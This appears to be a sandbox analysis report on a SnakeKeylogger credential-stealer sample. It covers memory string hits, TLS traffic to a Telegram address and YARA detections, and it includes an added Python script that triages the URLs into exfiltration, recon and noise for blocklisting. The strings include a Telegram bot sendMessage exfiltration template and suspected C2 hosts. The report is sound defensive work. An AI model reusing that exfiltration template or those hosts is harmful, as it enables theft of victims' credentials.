Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: 3140, EUR.exe, 00000000.00000002.1738339324.0000000006E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20a
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.000000000305F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.000000000324F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4122819893.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000032E5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004292000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 3140, EUR.exe, 00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413B000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004162000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040ED000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004480000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000044CE000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432A000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000045A4000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004351000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 3140, EUR.exe, 00000008.00000002.4131086407.00000000040CA000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.0000000004390000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.000000000413E000.00000004.00000800.00020000.00000000.sdmp, 3140, EUR.exe, 00000008.00000002.4131086407.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042E3000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.0000000004487000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000432D000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000457F000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.000000000445C000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4130183876.00000000042B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: 3140, EUR.exe, 00000008.00000002.4122819893.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, lkuPOyvaWlIu.exe, 0000000F.00000002.4122549015.00000000033ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2
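The string hits above mix three things that an analyst has to separate by hand: the exfiltration channel (the `api.telegram.org/bot/sendMessage?chat_id=&text=` template, whose token and chat ID are blank in the dump and filled in at runtime), the victim-profiling lookups (`checkip.dyndns.org`, `reallyfreegeoip.org`, where `8.46.123.33` is the sandbox's own egress address rather than an indicator), and license/metadata noise from embedded fonts and Office assemblies (`fontbureau.com`, `carterandcone.coml`, `support.office.com`). Memory carving also glues trailing bytes onto many strings (`designersG`, `hl=enlB`, `33$`). The script below is an added triage helper written for this report, not part of the sandbox output; the categories, the noise allow-list and the junk-suffix heuristic are the editor's assumptions, and the sample list is the URL column of the hits above with the dump prefixes dropped.

```python
"""Triage 'String found in binary or memory' URL hits from a sandbox report.

Added example, not sandbox output. Categories, allow-list and the junk-suffix
heuristic are editorial assumptions built from the hits in this report.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: URL column of the report's string hits, dump prefixes dropped.
SAMPLE_STRINGS = [
    "http://checkip.dyndns.org/",
    "http://checkip.dyndns.org/q",
    "http://quicklyserv.com",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "http://varders.kozow.com:8081",
    "http://www.fontbureau.com/designers",
    "http://www.fontbureau.com/designersG",
    "http://www.carterandcone.coml",
    "https://api.telegram.org/bot",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "https://reallyfreegeoip.org/xml/",
    "https://reallyfreegeoip.org/xml/8.46.123.33",
    "https://reallyfreegeoip.org/xml/8.46.123.33$",
    "https://chrome.google.com/webstore?hl=en",
    "https://chrome.google.com/webstore?hl=enlB",
]

# Assumption: hosts expected in a .NET binary that embeds fonts / Office assemblies.
LIBRARY_NOISE = {
    "schemas.xmlsoap.org", "www.apache.org", "www.carterandcone.com",
    "www.fontbureau.com", "www.fonts.com", "www.founder.com.cn",
    "www.galapagosdesign.com", "www.goodfont.co.kr", "www.jiyu-kobo.co.jp",
    "www.sajatypeworks.com", "www.sakkal.com", "www.sandoll.co.kr",
    "www.tiro.com", "www.typography.net", "www.urwpp.de", "www.zhongyicts.com.cn",
    "support.office.com", "www.office.com", "chrome.google.com",
}
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org"}
KNOWN_HOSTS = LIBRARY_NOISE | IP_LOOKUP_HOSTS | {"api.telegram.org"}
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def collapse_junk_suffixes(urls, max_junk=2):
    """Drop strings that equal a shorter hit plus <= max_junk trailing bytes.

    Carved memory often appends the next object's bytes to a URL ('designersG',
    'hl=enlB', '33$'); the shorter string is the real one. Heuristic only: a
    genuine one- or two-byte path ('/q', '/?') collapses as well, so keep the
    raw list for reference.
    """
    keep = []
    for u in sorted(set(urls), key=len):
        if not any(u.startswith(k) and 0 < len(u) - len(k) <= max_junk for k in keep):
            keep.append(u)
    return keep


def repair_host(host, max_junk=2):
    """Map a host with trailing junk ('www.carterandcone.coml') back to a known host."""
    if host in KNOWN_HOSTS:
        return host
    for k in KNOWN_HOSTS:
        if host.startswith(k) and len(host) - len(k) <= max_junk:
            return k
    return host


def classify(url):
    """Return (category, analyst note) for one URL string."""
    parts = urlsplit(url)
    host = repair_host(parts.hostname or "")
    if host == "api.telegram.org":
        note = "Bot API exfiltration channel"
        if "/sendMessage" in parts.path:
            note += "; bot token and chat_id are blank in the template, filled at runtime"
        return "exfil:telegram", note
    if host in IP_LOOKUP_HOSTS:
        note = "victim public-IP / geolocation lookup"
        ip = IPV4_RE.search(parts.path)
        if ip:
            note += f"; {ip.group()} is the analysis host's egress address, not an IOC"
        return "recon:ip-lookup", note
    if host in LIBRARY_NOISE:
        return "noise:library-metadata", "font licence / framework string, ignore"
    note = "unknown host: check passive DNS, consider blocking"
    if parts.port and parts.port not in (80, 443):
        note += f"; non-standard port {parts.port}"
    return "review:unknown-host", note


def triage(raw_strings):
    """Collapse junk variants, then group (url, note) pairs by category."""
    out = {}
    for u in collapse_junk_suffixes(raw_strings):
        cat, note = classify(u)
        out.setdefault(cat, []).append((u, note))
    return out


def blocklist_hosts(raw_strings):
    """Hosts worth a block/alert rule: the exfil channel and every unknown host."""
    hosts = set()
    for cat in ("exfil:telegram", "review:unknown-host"):
        for u, _ in triage(raw_strings).get(cat, []):
            hosts.add(urlsplit(u).hostname)
    return sorted(hosts)


if __name__ == "__main__":
    for cat, hits in sorted(triage(SAMPLE_STRINGS).items()):
        print(cat)
        for u, note in hits:
            print(f"  {u}  # {note}")
```

On this sample the two unknown hosts left for review are `quicklyserv.com` and `varders.kozow.com:8081`, the latter matching the "TCP or UDP traffic on non-standard ports" signature in the overview; the Telegram host is the exfil path, and blocking it at the network layer is a policy decision, since legitimate Telegram clients use the same endpoint.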

System Summary

Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07644608 0_2_07644608
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076436D0 0_2_076436D0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07640040 0_2_07640040
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07640F28 0_2_07640F28
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07647918 0_2_07647918
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764E750 0_2_0764E750
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076436C0 0_2_076436C0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076445F9 0_2_076445F9
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076434C0 0_2_076434C0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076434B1 0_2_076434B1
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07645378 0_2_07645378
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07645331 0_2_07645331
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07645388 0_2_07645388
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643260 0_2_07643260
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643250 0_2_07643250
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764C168 0_2_0764C168
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764001E 0_2_0764001E
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076430C0 0_2_076430C0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_076430B0 0_2_076430B0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07640F17 0_2_07640F17
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07641E40 0_2_07641E40
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643E40 0_2_07643E40
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07644E40 0_2_07644E40
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07641E50 0_2_07641E50
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643E50 0_2_07643E50
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07644E50 0_2_07644E50
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643EFB 0_2_07643EFB
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764BD30 0_2_0764BD30
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764DDA0 0_2_0764DDA0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07641C40 0_2_07641C40
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07641C50 0_2_07641C50
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07642A20 0_2_07642A20
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07642A11 0_2_07642A11
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764D968 0_2_0764D968
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764D958 0_2_0764D958
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643928 0_2_07643928
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07647908 0_2_07647908
